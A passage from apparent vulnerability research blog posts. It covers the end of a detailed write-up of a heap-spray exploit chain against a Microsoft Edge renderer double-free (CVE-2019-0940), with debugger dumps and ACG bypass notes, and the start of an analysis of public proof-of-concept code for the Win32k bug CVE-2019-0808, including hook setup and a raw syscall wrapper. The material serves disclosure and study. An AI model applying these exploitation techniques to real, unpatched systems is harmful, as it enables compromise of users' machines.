  3. audio buffer objects are sprayed; this also creates 0x10-byte raw data buffer objects with arbitrary size and contents; some of the buffers take the freed spots
  4. the double-free is triggered and one of the 0x10-byte raw data buffer objects is freed (it is possible to read-write this object)
  5. objects of 0x10-bytes size are sprayed, they contain two pointers (0x8-bytes) to 0x20-byte sized raw data buffer objects
  6. the exploit iterates over the raw data buffer objects allocated on step 3 and searches for the overwrite
  7. objects allocated on step 5 are freed (with 0x20-byte sized objects) and 0x20-byte sized typed arrays are sprayed over them
  8. the exploit leaks pointers to two of the sprayed typed arrays
  9. 0x10-byte sized objects are sprayed, they contain two pointers to the 0x200-byte sized raw data buffer objects; audio source will keep writing to these buffers
  10. the exploit leaks pointers to two of the sprayed write-buffer objects
  11. the exploit starts playing audio, this starts writing to the controllable (vulnerable) object address of the typed array (the address is increased by 0x10 bytes to point to the length of the typed array) in the loop; the audio buffer source node keeps writing to the 0x200-byte data buffer, but is re-writing pointers to the buffer in the 0x10-byte object; the repeated write in the loop is required to win a race
  12. after a certain amount of iterations the exploit quits looping and checks if the typed array has increased length
  13. at this point exploit has achieved a relative read-write primitive
  14. the exploit uses the relative read to find the WebCore::AudioBufferData and WTF::NeuteredTypedArray objects (they are placed adjacent on the heap)
  15. the exploit uses data found during the previous step in order to construct a typed array which can be used for arbitrary read-write
  16. the exploit creates a fake DataView object for more convenient memory access
  17. with arbitrary read-write is achieved, the exploit launches a sandbox escape.

The following diagram can help understand the described steps:

Renderer exploitation steps

Getting relative read-write primitive

To trigger the vulnerability, thirty canvas pattern objects are created, this forces the hash table to grow. Then the canvas pattern objects are freed and the hash table is shrunk; this creates a dangling pointer to the DXImageRenderTarget in the hash table entry. It is yet not possible to access the pointer to the freed object.

After the DXImageRenderTarget object is freed by the TDispResourceCache<CDispNoLock,1,0>::Remove method, the spray is performed to allocate audio context data buffer objects – let us call it spray “A”. Data buffer objects are created by calling audio context createBuffer(). This function has the following prototype:

let buffer = baseAudioContext.createBuffer(numOfchannels, length, sampleRate);

The numOfchannels argument denotes a number of pointers to channel data to create, length is the length of the data buffer, sampleRate is not important for exploitation. Javascript createBuffer() triggers the call to CDOMAudioContext::Var_createBuffer(), which eventually calls WebCore::AudioChannelData::Initialize():

void __fastcall WebCore::AudioChannelData::Initialize(
	WebCore::AudioChannelData *this,
	struct WebCore::ExceptionState *a2,
	unsigned int a3
)
{
    WebCore::AudioChannelData *this_; // rsi
    unsigned int length; // ebx
    struct WebCore::ExceptionState *exceptionState; // rdi
    void *ptr; // rax
    __int64 IEOwnedTypedArray; // rax
    MemoryProtection *v8; // rbx

    this_ = this;
    length = a3;
    exceptionState = a2;
    ptr = MemoryProtection::HeapAlloc&amp;amp;lt;0&amp;amp;gt;(0x18ui64);
    IEOwnedTypedArray = Abandonment::CheckAllocationUntyped(ptr, 0x18ui64);
    if ( IEOwnedTypedArray )
    {
        IEOwnedTypedArray = WTF::IEOwnedTypedArray&amp;amp;lt;1,float&amp;amp;gt;::IEOwnedTypedArray&amp;amp;lt;1,float&amp;amp;gt;(IEOwnedTypedArray, __PAIR64__(exceptionState, IEOwnedTypedArray), length);
    }
    v8 = IEOwnedTypedArray;
    if ( !*exceptionState )
    {
        v8 = 0i64;
        TSmartMemory&amp;amp;lt;WebCore::AudioProcessor&amp;amp;gt;::operator=(this_ + 2, IEOwnedTypedArray);
    }
    if ( v8 )
    {
        WTF::IEOwnedTypedArray&amp;amp;lt;1,float&amp;amp;gt;::`scalar deleting destructor`(v8, 1);
    }
}

On line 17 a WTF::IEOwnedTypedArray object is allocated on the default Windows heap. This object is interesting for exploitation as it contains the following metadata:

0:016&amp;amp;gt; dq 000001b0`374fbd80 L20/8
000001b0`374fbd80  00007ffe`47f8b4a0 000001b0`379e9030 ; vtable; pointer to the data buffer
000001b0`374fbd90  00000000`00000030 00080000`00000000 ; length; unused

0:016&amp;amp;gt; dq 000001b0`379e9030 L10/8
000001b0`379e9030  0000003a`cafebeef 00000000`00000002 ; arbitrary data

0:016&amp;amp;gt; ln 00007ffe`47f8b4a0
(00007ffe`47f8b4a0)   edgehtml!WTF::IEOwnedTypedArray&amp;amp;lt;1,float&amp;amp;gt;::`vftable`

On line 21 the data buffer is allocated (also on the default Windows heap). One of the buffers takes the spot of the freed DXImageRenderTarget object. This data buffer has the following layout:

0:016&amp;amp;gt; dq 000001b0`377fa7e0 L10/8
000001b0`377fa7e0  00000000`00000000 00000000`00000001

The second quad-word is a reference counter. Values other than 1 trigger access to the virtual function table which does not exist and cause a crash. A reference counter value of 1 means that the object is going to be freed.

The data buffer which is allocated in place of the freed object is used throughout the exploit to read and write values placed inside this buffer.

Before freeing the object for the second time, audio context buffer sources are created by calling Javascript createBufferSource(). This function does not accept any arguments, but is expecting the buffer property to be set. Allocations are made before the vulnerable object is freed so to avoid unnecessary noise on the heap – let us call it spray “B”. The buffer property is set to one of the buffer objects which were created during startup (i.e. before triggering the vulnerability) by calling createBuffer() – let us call it spray “C”. During this property access, the following method is called:

void __fastcall WebCore::AudioBufferSourceNode::setBuffer(
	WebCore::AudioBufferSourceNode *this,
	struct IActiveScriptDirect *a2,
	struct WebCore::AudioBuffer *a3,
	struct WebCore::ExceptionState *a4
)
{
    struct WebCore::ExceptionState *exceptionState; // rbp
    struct WebCore::AudioBuffer *audioBuffer; // rsi
    struct IActiveScriptDirect *v6; // r12
    WebCore::AudioBufferSourceNode *this_; // rdi
    bool v8; // zf
    struct CBase **v9; // r14
    __int64 v10; // rcx
    void *channelCount; // r15
    WebCore::AudioNodeOutput *audioNode; // rax
    WebCore::AudioContext *v13; // [rsp+20h] [rbp-38h]
    bool v14; // [rsp+28h] [rbp-30h]
    int hr; // [rsp+70h] [rbp+18h]

    exceptionState = a4;
    audioBuffer = a3;
    v6 = a2;
    this_ = this;
    if ( a3 )
    {
        v8 = *(this + 0x1E) == *(a3 + 6);
    }
    else
    {
        v8 = *(this + 0x1D) == 0i64;
    }
    if ( !v8 )
    {
        v9 = (this + 0xE8);
        if ( *(this + 0x1D) )
        {
            hr = 0x8070000B;
            WebCore::ExceptionState::throwDOMException(a4, &amp;amp;amp;hr, 0xDC37u);
            return;
        }
        v13 = *(this + 8);
        WebCore::AudioContext::lock(v13, &amp;amp;amp;v14);
        EnterCriticalSection(this_ + 4);
        ++*(this_ + 0x19);
        // some code skipped for brevity...
        channelCount = *(*(audioBuffer + 6) + 0x20i64);
        if ( channelCount &amp;amp;lt;= 0x20 )
        {
            if ( !*(audioBuffer + 0x38) )
            {
                if ( (*(this_ + 0x27) - 1) &amp;amp;lt;= 1 )
                {
                    WebCore::AudioBufferSourceNode::acquireBufferContents(this_, exceptionState, v6, audioBuffer);
                    if ( *exceptionState )
                    {
                        goto LABEL_23;
                    }
                    if ( *(this_ + 0x138) )
                    {
                        WebCore::AudioBufferSourceNode::clampGrainParameters(this_, audioBuffer);
                    }
                    else
                    {
                        *(this_ + 0x26) = 0i64;
                    }
                }
                CJScript9Holder::InsertReferenceTo(this_, audioBuffer);
                audioNode = WebCore::AudioNode::output(this_, 0);
                WebCore::AudioNodeOutput::setNumberOfChannels(audioNode, channelCount);
                TSmartArray&amp;amp;lt;System::String *&amp;amp;gt;::New(this_ + 0x20, channelCount);
LABEL_20:
                if ( *v9 )
                {
                    CJScript9Holder::RemoveReferenceTo(this_, *v9);
                }
                TSmartPointer&amp;amp;lt;CVideoElement,Tree::NodeReferenceTraits,CVideoElement *&amp;amp;gt;::operator=(v9, audioBuffer);
                goto LABEL_23;
            }
            hr = 0x8070000B;
            WebCore::ExceptionState::throwDOMException(exceptionState, &amp;amp;amp;hr, 0xDC33u);
        }
        else
        {
            WebCore::ExceptionState::throwTypeError(exceptionState, 0xDC06u, channelCount);
        }
LABEL_23:
        --*(this_ + 0x19);
        LeaveCriticalSection(this_ + 4);
        WebCore::AudioContext::AutoLocker::~AutoLocker(&amp;amp;amp;v13);
    }
}

On line 71 yet another data buffer is allocated. The amount of bytes depends on the number of channels. Each channel creates one pointer which points to the data with arbitrary size and controllable contents. This is a useful primitive which is used later during the exploitation process.

To trigger the call to the WebCore::AudioBufferSourceNode::setBuffer() method, the audio must be already playing: either start() is called with the buffer property already set, or the buffer property is set and then start() is called.

Next, the double-free vulnerability is triggered and one of the audio channel data buffers is freed, although control from Javascript is retained.

The start() method of the audio buffer source object is called on each object of spray “B”. This creates multiple 0x10-byte sized objects with two pointers to the 0x20-byte sized data buffer object of spray “C”. During this spray one of the sprayed objects takes over the freed object from spray “A”.

Then the exploit iterates over spray “A” to find a data buffer with changed contents. Each object of spray “A” has getChannelData() – which returns the channel data as a Float32Array typed array. getChannelData() accepts only the channel number argument. Once the change has been found, a typed array is created. This typed array is read-writable and is further used multiple times in the exploit to leak and write pointers. Let us call it typed array “TA1”.

After the controllable channel data typed array is found, all of the spray “B”objects are freed. All data relevant to spray “B” is scoped just to one function. This is required to remove all internal references from Javascript to the data buffer from spray “C”. Otherwise it will not be possible to free the data buffer later.

After the return from the function, another spray is made – let us call it spray “D”. This spray prepares an audio buffer source data for the next steps and takes over the freed object. At this point the overwritten object does not contain data.

Then the exploit iterates over spray “D” and calls the start() function of each object. This writes to the freed object two pointers pointing to the 0x200-byte sized objects. These objects are used by the audio context to write audio data to be played. It is important to note that data is periodically written to this buffer, as well as pointers constantly written to the 0x10-byte objects. (This poses another problem which is resolved at the next step.) These pointers are also leaked via the “TA1” typed array.

Then the buffer object which was used for spray “B” is freed and a different spray is performed to take over the just-freed data buffer – let us call it spray “E”. Spray “E” allocates typed arrays (which are of size 0x20 bytes) and one of the typed arrays overwrites contents of the freed 0x20-byte data buffer. This allows a leak of pointers to two of the sprayed typed arrays via the typed array “TA1”. Only one pointer to the typed array is required for the exploit, let us call it typed array “TA2”. This typed array points to the data buffer of 0x30 bytes. The size of this buffer is important as it allows placement of other objects nearby which are useful for exploitation.

At this point it is known where the two typed arrays and the two audio write-buffers are located. The exploit enters a loop which constantly writes a pointer to the “TA2” typed array to the 0x10-byte object. The written pointer is increased by 0x10 bytes to point to the length field. The loop is required to win a race condition because the audio context thread keeps re-writing pointers in the 0x10-byte object. After a certain number of iterations the loop is ended and the exploit searches for the overwritten typed array.

The overwritten WTF::IEOwnedTypedArray typed array gives a relative read-write primitive.

Getting arbitrary read-write primitive

Before triggering the vulnerability the exploit has made another spray which has allocated the buffer sources and appropriate buffers for the sources – let us call it spray “F” . During this spray the WebCore::AudioBufferData objects of 0x30 bytes size with the following memory layout are created:

0:016&amp;amp;gt; dq 000001b0`379e9570 L30/8
000001b0`379e9570  00007ffe`47f85988 00000000`45fa0000
000001b0`379e9580  00000000`0000000c 000001b0`379e9420
000001b0`379e9590  0000000a`0000000a 00000000`00000001
0:016&amp;amp;gt; ln 00007ffe`47f85988
(00007ffe`47f85988)   edgehtml!RefCounted&amp;amp;lt;WebCore::AudioBufferData,MultiThreadedRefCount&amp;amp;gt;::`vftable`

These objects are placed nearby the data buffer which is controlled by the typed array “TA2”. WTF::NeuteredTypedArray objects of size 0x30 bytes are placed nearby too:

0:016&amp;amp;gt; dq 000001b0`379e97b0 L30/8
000001b0`379e97b0  00007ffe`47f8b460 000001b0`21fa7fa0
000001b0`379e97c0  00000000`00000020 000001b0`20e6e550
000001b0`379e97d0  00000000`00000001 000001b0`381fc380
0:016&amp;amp;gt; ln 00007ffe`47f8b460
(00007ffe`47f8b460)   edgehtml!WTF::NeuteredTypedArray&amp;amp;lt;1,float&amp;amp;gt;::`vftable`

After the relative read-write primitive is gained, offsets from the beginning of the typed array “TA2” buffer to these objects are found by searching for the specific pattern.

Knowing the offset to the WebCore::AudioBufferData object allows to leak a pointer to the audio channel data buffer. (The audio channel data is used to create a fake controllable DataView object and eventually achieve an arbitrary read-write primitive.) At offset 0x18 of the WebCore::AudioBufferData object, the pointer to the audio channel data buffer is stored. Before calling getChannelData() the memory layout of the channel data buffer looks like the following:

0:001&amp;amp;gt; dq 00000140`e87e81c0 L30/8
00000140`e87e81c0  00007ffe`47f85988 00000000`45fa0000
00000140`e87e81d0  00000000`0000000c 00000142`01c6b230
00000140`e87e81e0  0000000a`0000000a 00000000`00000001
0:001&amp;amp;gt; dq 00000142`01c6b230
00000142`01c6b230  00000000`00000000 00000000`00000000
00000142`01c6b240  00000140`e87ee160 00000000`00000000
00000142`01c6b250  00000000`00000000 00000140`e87ee240
00000142`01c6b260  00000000`00000000 00000000`00000000
00000142`01c6b270  00000140`e87ee2e0 00000000`00000000
00000142`01c6b280  00000000`00000000 00000140`e87ee4c0
00000142`01c6b290  00000000`00000000 00000000`00000000
00000142`01c6b2a0  00000140`e87ee500 00000000`00000000
0:001&amp;amp;gt; dq 00000140`e87ee160
00000140`e87ee160  00007ffe`47f8b4a0 00000140`e87e8430
00000140`e87ee170  00000000`00000030 00080000`00000000
00000140`e87ee180  00007ffe`47de5838 00000140`e87ee180
00000140`e87ee190  80000000`00000000 00040000`00000000
00000140`e87ee1a0  00007ffe`47f8b4a0 00000140`e87e8490
00000140`e87ee1b0  00000000`00000030 00080000`00000000
00000140`e87ee1c0  00007ffe`47de5838 00000140`e87ee1c0
00000140`e87ee1d0  80000000`00000000 00080000`00000000
0:001&amp;amp;gt; ln 00007ffe`47de5838
(00007ffe`47de5838)   edgehtml!WTF::TypedArray&amp;amp;lt;1,float&amp;amp;gt;::`vftable`

After calling getChannelData() member of the WebCore::AudioBufferData object, pointers in the channel data buffer are moved around and start pointing to the typed array objects allocated on the Chakra heap. This is important as it allows leaking the typed array pointers and creating a fake typed array. This is the memory layout of the channel data buffer after the call to getChannelData():

0:001&amp;amp;gt; dq 00000140`01c6b230
00000140`01c6b230  00000140`e87e7eb0 00000000`00000000 ; pointer to the typed array
00000140`01c6b240  00000000`00000000 00000141`0142f900
00000140`01c6b250  00000000`00000000 00000000`00000000
00000140`01c6b260  00000141`0142f880 00000000`00000000
00000140`01c6b270  00000000`00000000 00000141`0142f800
00000140`01c6b280  00000000`00000000 00000000`00000000
00000140`01c6b290  00000141`0142f780 00000000`00000000
00000140`01c6b2a0  00000000`00000000 00000141`0142f700
0:001&amp;amp;gt; dq 00000140`e87e7eb0 L40/8
00000140`e87e7eb0  00007ffe`4694c630 00000140`e87e7e60
00000140`e87e7ec0  00000000`00000000 00000000`00000000
00000140`e87e7ed0  00000000`00000020 00000141`01a9d280
00000140`e87e7ee0  00000000`00000004 00000141`01314ec0
0:001&amp;amp;gt; ln 00007ffe`4694c630
(00007ffe`4694c630)   chakra!Js::TypedArray&amp;amp;lt;float,0,0&amp;amp;gt;::`vftable`

Knowing the offset to the WTF::NeuteredTypedArray object allows to achieve an arbitrary read primitive.

The buffer this object points to cannot be used for a write. Once the write happens, the buffer is moved to another heap. Increasing the length of the buffer is not possible due to security asserts enabled. An attempt to write to the buffer with the modified length leads to a crash of the renderer process.

The layout of the WTF::NeuteredTypedArray object looks like the following:

0:001&amp;amp;gt; dq 00000140`e87e81f0 L30/8
00000140`e87e81f0  00007ffe`47f8b460 00000140`e70f87e0
00000140`e87e8200  00000000`00000020 00000140`d1c6e5a0
00000140`e87e8210  00000000`00000001 00000140`d1cff2a0
0:001&amp;amp;gt; ln 00007ffe`47f8b460
(00007ffe`47f8b460)   edgehtml!WTF::NeuteredTypedArray&amp;amp;lt;1,float&amp;amp;gt;::`vftable`
0:001&amp;amp;gt; dq 00000140`e70f87e0 L20/8
00000140`e70f87e0  00000000`cafe0011 00000000`00000032
00000140`e70f87f0  00000000`00000000 00000000`00000000

A pointer to the data buffer is stored at offset 8. It is possible to overwrite this pointer and point to any address to arbitrarily read memory.

With the arbitrary read primitive the contents of the typed array and the channel data buffer of the WebCore::AudioBufferData object are leaked. With the ability to write to the relative typed array, the following contents are placed in the controllable buffer:

0:001&amp;amp;gt; dq 00000140`e87e7da0 L150/8
00000140`e87e7da0  00000140`e87e7eb0 00000000`00000000
00000140`e87e7db0  00000000`00000000 00000141`0142f900
00000140`e87e7dc0  00000000`00000000 00000000`00000000
00000140`e87e7dd0  00000141`0142f880 00000000`00000000
00000140`e87e7de0  00000000`00000000 00000141`0142f800
00000140`e87e7df0  00000000`00000000 00000000`00000000
00000140`e87e7e00  00000141`0142f780 00000000`00000000
00000140`e87e7e10  00000000`00000000 00000141`0142f700
00000140`e87e7e20  00000000`00000000 00000000`00000000
00000140`e87e7e30  00000141`0142f680 00000000`00000000
00000140`e87e7e40  00000000`00000000 00000141`0142f600
00000140`e87e7e50  00000000`00000000 00000000`00000000
00000140`e87e7e60  00000080`00000038 00000140`d2968000 ; type tag ; pointer to the Js::JavascriptLibrary
00000140`e87e7e70  00000000`00000000 00000141`0142f500
00000140`e87e7e80  00000000`00000000 00000000`00000000
00000140`e87e7e90  00000000`00000000 00000000`00000000
00000140`e87e7ea0  00000001`00002958 00000000`0f69d8c7
00000140`e87e7eb0  00007ffe`4694c630 00000140`e87e7e60 ; vtable; metadata pointer
00000140`e87e7ec0  00000000`00000000 00000000`00000000
00000140`e87e7ed0  00000000`00000020 00000141`01a9d280
00000140`e87e7ee0  00000000`00000004 00000141`01314ec0
0:001&amp;amp;gt; dq 00000140`e87e7f80 L30/8
00000140`e87e7f80  00007ffe`47f85988 00000000`45fa0000
00000140`e87e7f90  00000000`0000000c 00000140`e87e7da0
00000140`e87e7fa0  0000000a`0000000a 00000000`00000001
0:001&amp;amp;gt; ln 00007ffe`47f85988
(00007ffe`47f85988)   edgehtml!RefCounted&amp;amp;lt;WebCore::AudioBufferData,MultiThreadedRefCount&amp;amp;gt;::`vftable`
0:001&amp;amp;gt; dq 00000141`0142f880
00000141`0142f880  00007ffe`4694c630 00000140`d29753c0
00000141`0142f890  00000000`00000000 00000000`00000000
00000141`0142f8a0  00000000`0000000c 00000141`01a9d320
00000141`0142f8b0  00000000`00000004 00000140`e87e8040
00000141`0142f8c0  00007ffe`4694c630 00000140`d29753c0
00000141`0142f8d0  00000000`00000000 00000000`00000000
00000141`0142f8e0  00000000`00000008 00000141`01438230
00000141`0142f8f0  00000000`00000004 00000138`cffb9320
0:001&amp;amp;gt; ln 00007ffe`4694c630
(00007ffe`4694c630)   chakra!Js::TypedArray&amp;amp;lt;float,0,0&amp;amp;gt;::`vftable`

After this operation the WebCore::AudioBufferData object points to the fake channel data (located at 0x00000140e87e7da0). The channel data contains a pointer to the fake DataView object (located at 0x00000140e87e7eb0). Initially, the Float32Array object is leaked and placed, but it is not a very convenient type to use for exploitation. To convert it to a DataView object, the type tag has to be changed in the metadata. The type tag for the Float32Array object type is 0x31, for the DataView object it is 0x38.

The fake DataView object is accessed by calling getChannelData() of the WebCore::AudioBufferData object.

At this point an arbitrary read-write primitive is achieved.

Wrapping up the renderer exploit

Getting code execution in Microsoft Edge renderer is a bit more involved in contrast to other browsers since Microsoft Edge browser employs mitigations known as Arbitrary Code Guard (ACG) and Code Integrity Guard (CIG). Nevertheless, there is a way to bypass ACG. Having an arbitrary read-write primitive it is possible to find the stack address, setup a fake stack frame and divert code execution to the function of choice by overwriting the return address. This method was chosen to execute the sandbox escape payload.

The last problem that had to be addressed in order to have reliable process continuation is a LFH double-free mitigation. Once exploitation is over, some pointers are left and when they are picked up by the heap manager, the process will crash. Certain pointers can be easily found by leaking address of required objects. One last pointer had to be found by scanning the heap as there was no straightforward way to find it. Once the pointers are found they are overwritten with null.

Open problems

The exploit has the following issues:

  1. the vulnerability trigger depends on hardware;
  2. exploit reliability is about 75%;

The first issue is due to the described requirement of hardware error. The trigger works only on VMWare and on some devices with integrated video hardware. It is potentially possible to avoid hardware dependency by triggering some generic video graphics hardware error.

The second issue is mostly due to the requirement to have complicated heap manipulations and LFH mitigations. Probably it is possible to improve reliability by performing smarter heap arrangement.

Process continuation was solved as described in the previous section. No artifacts exist.

Detection

It is possible to detect exploitation of the described vulnerability by searching for the combination of the following Javascript code:

  1. repeated calls to createPattern()
  2. setting canvas attributes “width” and “height” to large values
  3. calling createPattern() again

Mitigation

It is possible to mitigate this issue by disabling Javascript.
The described vulnerability was patched by Microsoft in the May updates.

Conclusion

As a result, reliability of the renderer exploit achieved a ~75% success rate. Exploitation takes about 1-2 seconds on average. When multiple retries are required then exploitation can take a bit more time.

Microsoft has gone to great lengths to harden their Edge browser renderer process as browsers still remain a major threat attack vector and the renderer has the largest attack surface. Yet a single vulnerability was used to achieve memory disclosure and gain arbitrary read-write to compromise a content process. Part 2 will discuss an interesting logical sandbox escape vulnerability.

Exodus 0day subscribers have had access to this exploit for use on penetration tests and/or implementing protections for their stakeholders.

The post Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1 appeared first on Exodus Intelligence.

Windows Within Windows – Escaping The Chrome Sandbox With a Win32k NDay

17 May 2019 at 14:53

This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain.

Overview

On March 7th 2019, Google came out with a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers escape the Chrome sandbox and execute arbitrary code as the SYSTEM user.

Since Google’s blog post, there has been one crash PoC exploit for Windows 7 x86 posted to GitHub by ze0r, which results in a BSOD. This blog details a working sandbox escape and a demonstration of the full exploit chain in action, which utilizes these two bugs to illustrate the APT attack encountered by Google in the wild.

Analysis of the Public PoC

To provide appropriate context for the rest of this blog, this blog will first start with an analysis of the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub. hMenuRoot will then be set up as the primary drop down menu, and hMenuSub will be configured as its submenu.

HMENU hMenuRoot = CreatePopupMenu();
HMENU hMenuSub = CreatePopupMenu();
...
MENUINFO mi = { 0 };
mi.cbSize = sizeof(MENUINFO);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP;
SetMenuInfo(hMenuRoot, &mi);
SetMenuInfo(hMenuSub, &mi);

AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");
AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");

Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook will ensure that WindowHookProc() is executed prior to a window procedure being executed. Once this is done, SetWinEventHook() is called to set an event hook to ensure that DisplayEventProc() is called when a popup menu is displayed.

SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,hInst,DisplayEventProc,GetCurrentProcessId(),GetCurrentThreadId(),0);

The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook.

Window message call flow before and after setting the WH_CALLWNDPROC hook

Once the hooks have been installed, the hWndFakeMenu window will be created using CreateWindowA() with the class string “#32768”, which, according to MSDN, is the system reserved string for a menu class. Creating a window in this manner will cause CreateWindowA() to set many data fields within the window object to a value of 0 or NULL as CreateWindowA() does not know how to fill them in appropriately. One of these fields which is of importance to this exploit is the spMenu field, which will be set to NULL.

hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

hWndMain is then created using CreateWindowA() with the window class wndClass. This will set hWndMain‘s window procedure to DefWindowProc() which is a function in the Windows API responsible for handling any window messages not handled by the window itself.

The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is done as a preventative measure to ensure the user doesn’t accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally the last parameters for CreateWindowA() ensure that the window is positioned at (0x1, 0x1), and that the window is 0 pixels by 0 pixels big. This can be seen in the code below.

WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = hInst;
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "WNDCLASSMAIN";
RegisterClassExA(&wndClass);
hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL);
	
MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0))
{
	TranslateMessage(&msg);
	DispatchMessageW(&msg);

	if (iMenuCreated >= 1) {
		bOnDraging = TRUE;
		callNtUserMNDragOverSysCall(&pt, buf);
		break;
	}
}

After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This will result in a window message being placed on hWndMain‘s message stack, which will be retrieved in main()‘s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain‘s window procedure via DispatchMessageW(). This will result in the window procedure hook being executed, which will call WindowHookProc().

BOOL bOnDraging = FALSE;
....
LRESULT CALLBACK WindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
    tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;

    if (!bOnDraging) {
        return CallNextHookEx(0, code, wParam, lParam);
    }
....

As the bOnDraging variable is not yet set, the WindowHookProc() function will simply call CallNextHookEx() to call the next available hook. This will cause a EVENT_SYSTEM_MENUPOPUPSTART event to be sent as a result of the popup menu being created. This event message will be caught by the event hook and will cause execution to be diverted to the function DisplayEventProc().

UINT iMenuCreated = 0;

VOID CALLBACK DisplayEventProc(HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime)
{
    switch (iMenuCreated)
    {
    case 0:
        SendMessageW(hwnd, WM_LBUTTONDOWN, 0, 0x00050005);
        break;
    case 1:
        SendMessageW(hwnd, WM_MOUSEMOVE, 0, 0x00060006);
        break;
    }
    printf("[*] MSG\n");
    iMenuCreated++;
}

Since this is the first time DisplayEventProc() is being executed, iMenuCreated will be 0, which will cause case 0 to be executed. This case will send the WM_LMOUSEBUTTON window message to hWndMainusing SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain‘s window message queue, iMenuCreated is incremented.

hWndMain then processes the WM_LMOUSEBUTTON message and selects hMenu, which will result in hMenuSub being displayed. This will trigger a second EVENT_SYSTEM_MENUPOPUPSTART event, resulting in DisplayEventProc() being executed again. This time around the second case is executed as iMenuCreated is now 1. This case will use SendMessageW() to move the mouse to point (0x6, 0x6) on the user’s desktop. Since the left mouse button is still down, this will make it seem like a drag and drop operation is being performed. Following this iMenuCreated is incremented once again and execution returns to the following code with the message loop inside main().

CHAR buf[0x100] = { 0 };
POINT pt;
pt.x = 2;
pt.y = 2;
...
if (iMenuCreated >= 1) {
    bOnDraging = TRUE;
    callNtUserMNDragOverSysCall(&pt, buf);
    break;
}

Since iMenuCreated now holds a value of 2, the code inside the if statement will be executed, which will set bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call will be made to the function callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100 byte long output buffer buf.

callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, which is the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC’s method of obtaining the address of NtUserMNDragOver() from user32.dll since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10 which undergoes more constant changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change anytime user32.dll is updated.

void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2) {
	_asm {
		mov eax, 0x11ED
		push address2
		push address1
		mov edx, esp
		int 0x2E
		pop eax
		pop eax
	}
}

NtUserMNDragOver() will end up calling xxxMNFindWindowFromPoint(), which will execute xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the user mode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
    v6 = xxxSendMessage(
           var_pPopupMenu->spwndNextPopup,
           MN_FINDMENUWINDOWFROMPOINT,
           (WPARAM)&pPopupMenu,
           (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the 
                                      // MN_FINDMENUWINDOWFROMPOINT usermode callback
                                      // using the address of pPopupMenu as the 
                                      // wParam argument.
    ThreadUnlock1();
    if ( IsMFMWFPWindow(v6) )  // Validate the handle returned from the user
                               // mode callback is a handle to a MFMWFP window.
      v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned 
                                                                        // handle is a handle to 
                                                                        // a window object. Set v1 to
                                                                        // TRUE if all is good.
      ...

When the callback is performed, the window procedure hook function, WindowHookProc(), will be executed before the intended window procedure is executed. This function will check to see what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code will be executed.

if ((cwp->message == WM_MN_FINDMENUWINDOWFROMPOINT))
	{
		bIsDefWndProc = FALSE;
		printf("[*] HWND: %p \n", cwp->hwnd);
		SetWindowLongPtr(cwp->hwnd, GWLP_WNDPROC, (ULONG64)SubMenuProc);
	}
return CallNextHookEx(0, code, wParam, lParam);

This code will change the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It will also set bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc().

